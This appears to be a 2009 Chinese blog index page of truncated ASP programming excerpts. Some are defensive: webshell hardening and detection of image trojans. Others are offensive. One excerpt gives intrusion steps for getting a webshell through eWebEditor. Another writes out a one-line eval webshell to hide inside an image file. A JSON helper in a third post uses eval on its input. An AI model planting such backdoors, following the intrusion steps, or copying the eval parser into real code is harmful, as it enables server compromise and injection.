浏览模式: 普通 | 列表

asp解析json序列(推荐)

[ 2009-11-16 09:03:36 | 作者: admin ]
p.s. 将步骤一中的代码先复制到页面中,然后进行步骤二中的调用,vbscript可以使用jscript定义的函数


步骤一、使用jscript做核心函数
<script language="JScript" runat="Server">
function toObject(json) {
         eval("var o=" + json);
         return o;
}
function toArray(json){
         var dic = Server.CreateObject("Scripting.Dictionary")
         eval("var a=" + json);
         for(var i=0;i<a.length;i++){
                var obj = Server.CreateObject("Scripting.Dictionary")
...

阅读全文…

ip138数据判断地区归属

[ 2009-11-07 11:14:42 | 作者: admin ]
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<%
' http://www.nantiahu.com
tempstr = ""
'转换为字符串函数
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
...

阅读全文…

ASP与Access使用UTF-8网页乱码问题

[ 2009-10-24 12:45:02 | 作者: admin ]
用asp,access数据库,网页编码是utf-8。出现乱码,所有从数据库里读的中文字都是乱码。
问题解决:
<%@codepage="65001"%>
< http-equiv="Content-Type" content="text/html; charset=UTF-8">
一个也不能少
另外,文件要存为utf-8格式的
还有,程序不能出错,嘿嘿
要是有错误的程序,那么刚打开的时候正常的,刷新了就乱码了
这里说的出错时不会使整个页面不显示的出错。
1,<%@codepage="65001"%>
2,< http-equiv="Content-Type" content="text/html; charset=UTF-8">
3,Session.CodePage = 65001
4,文件存成 UTF-8
我来说说吧,这个我比较有经验,呵呵

2,< http-equiv="Content-Type" ...

阅读全文…

eWebEditor的利用

[ 2009-09-26 10:26:58 | 作者: admin ]
站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!

漏洞利用
利用eWebEditor获得WebShell的步骤大致如下:
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1’ src=’/edit/...

阅读全文…

asp图片木马

[ 2009-09-26 08:36:16 | 作者: admin ]
作者:红魂浩天
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。

        asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp
后门还是我众马中的首选,现在我们就把它作成图片asp木马。

首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>

一、include给我们指路

接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
...

阅读全文…

ASP木马Webshell之安全防范解决办法

[ 2009-09-26 08:32:38 | 作者: admin ]
文章简介:本文将为大家介绍在MicrosoftWin系列SERVER(IIS5.0、IIS6.0)中如何简单快速解决ASP中危险组件对WEB服务器系统的安全威胁之详细防范设置步骤;读完本文,您将可以使您的网站服务器免去ASP木马、Webshell所面对的提升权限、甚至危害到系统安全的威胁。

本文作者:李泊林/LeeBolin资深系统工程师、专业网络安全顾问。已成功为国内多家大中型企业,ISP服务商提供了完整的网络安全解决方案。尤其擅长于整体网络安全方案的设计、大型网络工程的策划、以及提供完整的各种服务器系列安全整体解决方案。

ASP木马、Webshell之安全防范解决办法正文内容:
注意:本文所讲述之设置方法与环境:适用于MicrosoftWindows2000Server/Win2003SERVER|IIS5.0/IIS6.0

1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:
...

阅读全文…

2个检测ASP图片木马的函数

[ 2009-09-26 08:26:46 | 作者: admin ]
如果是自己的服务器可以单独设置文件夹得运行权限(执行权限,无),即使上传木马也不会执行……

原文地址:http://blog.163.com/shui99/blog/static/6989944720091692456828/
'*******************************************************************************************************************************
' 函数说明:检测ASP图片木马的函数。由于FSO无法读取客户端文件的内容,所以只能在文件上传到服务器后再打开文件进行内容检查。
' 木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的
'ASP代码插在图片编
...

阅读全文…
Function CheckASP(Byval sFileName)
dim FStream,stamp,sData
Set FStream=Server.createobject(”ADODB.Stream”)
FStream.Open
FStream.Type=1
FStream.LoadFromFile sFileName
FStream.position=0
stamp=FStream.read
sData = ByteArray2Text( stamp )
If SniffHtml( sData ) Then
FStream.Close
Set FStream=nothing
CheckASP = true
EXIT Function
End If
If SniffASP( sData ) Then
FStream.Close
Set FStream=nothing
...

阅读全文…